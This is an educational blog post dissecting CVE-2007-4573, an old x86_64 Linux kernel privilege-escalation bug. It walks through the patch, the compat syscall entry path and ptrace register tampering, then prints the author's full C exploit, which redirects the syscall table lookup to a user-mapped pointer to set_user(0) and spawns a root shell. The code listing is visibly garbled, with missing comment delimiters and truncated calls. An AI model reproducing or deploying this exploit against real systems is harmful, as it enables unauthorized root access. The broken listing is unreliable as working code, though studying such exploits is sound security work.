Made of Bugs

CVE-2007-4573: The Anatomy of a Kernel Exploit

CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It's very simple to understand with a little bit of background, and the exploit is super-simple, but it's still more interesting than Yet Another NULL Pointer Dereference. Plus, it was the first kernel bug I wrote an exploit for, which was fun.

In this post, I'll write up my exploit for CVE-2007-4573, and try to give enough background for someone with some experience with C, Linux, and a bit of x86 assembly to understand what's going on. If you're an experienced kernel hacker, you probably won't find much new here, but if you're not, hopefully you'll get a sense for some of the pieces that go into a kernel exploit.

The patch

I'll start out with the patch, or rather a slightly simplified version, that omits some hunks that will be irrelevant for my discussion. Then I'll explain the context for the patch, and by that point we'll have enough context to understand the exploit code.

A simplified version of the patch follows (The original is 176df245 in linus's git repository) Note that this patch was applied to v2.6.22 – These files have moved around, so pull out an older kernel if you're trying to follow along at home:

--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &pt_regs -> arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_syscall

The patch defines the IA32_LOAD_ARGS macro, and replaces LOAD_ARGS with it in several places (I've only shown one for simplicity). LOAD_ARGS32 differs only slightly from the LOAD_ARGS macro that it is replacing, which is defined in include/asm-x86_64/calling.h:

.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax

As the name suggests, LOAD_ARGS32 loads the registers from the stack as 32-bit values, rather than 64-bit. Importantly, in doing so it takes advantage of a quirk in the x86_64 architecture, that causes the top 32 bits of the registers to be zeroed if you write to the 32-bit versions. LOAD_ARGS32 thus zero-extends the 32-bit values it loads into the 64-bit registers.

System call handling

So, why is this patch so important? Let's look at the context for the LOAD_ARGSLOAD_ARGS32 change. ia32entry.S contains the definitions for entry-points for 32-bit compatibility-mode system calls on an x86_64 processor. In other words, for 32-bit processes running on the 64-bit machine, or for 64-bit processes that use old-style int $0x80 system calls for whatever reason.

There are three entry points in the file, one for 32-bit SYSCALL instructions, one for 32-bit SYSENTER, and one for int $0x80. They are all very similar, and we will only consider the int $0x80 case here. At boot-time, Linux configures the processor so that int $0x80 will dispatch to the ia32_syscall entry point. Ignoring a bunch of debugging information, tracing, and other junk, this entry point's code is essentially simple:

        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call

%eax, according to Linux's syscall convention, stores the syscall number. The mov zero-extends it into %rax, and then we save it and the syscall arguments onto the stack.

The next block retrieves the struct thread_info for the current task, sets the TS_COMPAT status bit to indicate that we're handling a 32-bit compatibility mode syscall, and then checks the thread's flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to code to handle that work.

Next (at the cmpl), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.

IA32_ARG_FIXUP is a simple macro that moves registers around to translate between the Linux syscall calling convention and the x86_64 calling convention, which each hold arguments in different registers. Once we've fixed up the registers, the call instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.

Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.

One thing we should notice about this code is that when we check that the syscall is in bounds, we compare against the 32-bit %eax register, but when we actually dispatch the syscall, we use the full 64 bits in %rax. The movl at the top of the function serves to zero-extend %eax, so that normally, the top 32 bits of %rax are zero, and this distinction doesn't matter.

The problem arises in the "traced" path in ia32_tracesys, which is (again, with some extra code removed):

        movq %rsp,%rdi        /* &pt_regs -> arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call

Essentially, ia32_tracesys just calls into the C function syscall_trace_enter, with a pointer to the registers saved on the stack, and then restores the register values from the stack and jumps back to execute the system call.

Herein lies the problem. If syscall_trace_enter replaces the on-stack %rax with a 64-bit value, and LOAD_ARGS restores it, then the %eax/%rax distinction above becomes a problem. Aas long as %eax is less than (IA32_NR_syscalls-1), %rax can be much larger than the size of the syscall table, causing the call to index off the end of it.


So what happens inside syscall_trace_enter, and how can we take advantage of that to load a 64-bit value into the restored %rax? Well, that turns out to be the code that handles processes traced by the ptrace(2) process-tracing mechanism, which among other things, allows the tracer to stop a child process before each system call, and inspect and modify the child's registers for the system call procedes.

Reading ptrace(2), we find that we can use ptrace(PTRACE_SYSCALL,…) to cause a process to execute until its next system call, and then, once it's stopped, we can use ptrace(PTRACE_POKEUSER,…) to modify the tracee's registers.

Putting it all together

So, to exploit this bug, we need to:

  • Have a 64-bit process attach to some process with ptrace.
  • Use PTRACE_SYSCALL to stop that process at its next syscall
  • Have the process execute an int $0x80
  • Have the parent modify %rax in the child to be 64 bits wide, and allow the child to continue.

At this point, the child will index waaay off the end of the syscall table – so far off, in fact, that it will wrap around past the end of memory (On x86_64, the entire kernel is mapped into the last 2 GB of address space). Since the kernel and user programs run in the same address space, this means that, with an appropriate choice of %rax, the kernel will dereference an address in the user address space to find out the address of the function it should jump to in order to handle the system call.

My entire exploit code follows. This is not fully weaponized at all – it depends on tweaking for the specific target kernel, for one, but it works. (Well, if you can find an unpatched kernel anywhere any more these days, it works). Nowadays, if I were writing an exploit like this, I'd plug it into something like Brad Spengler's Enlightenment, which takes care of most of the annoying bits of executing shell-code in-kernel to change the current user, disable any security modules that might be problematic, and work across kernel versions, as necessary.

#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <stddef.h>

 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/$(uname -r)
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into call it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.

#define offset        (1L << 32)
#define landing       (syscall_table + 8*offset)
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".

int main() {
        if((signed long)mmap((void*)(landing&~0xFFF), 4096,
                                0, 0) < 0) {
        *(long*)landing = set_user;
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.

        pid_t child;
        child = fork();
          We fork two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                  In the parent we need to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.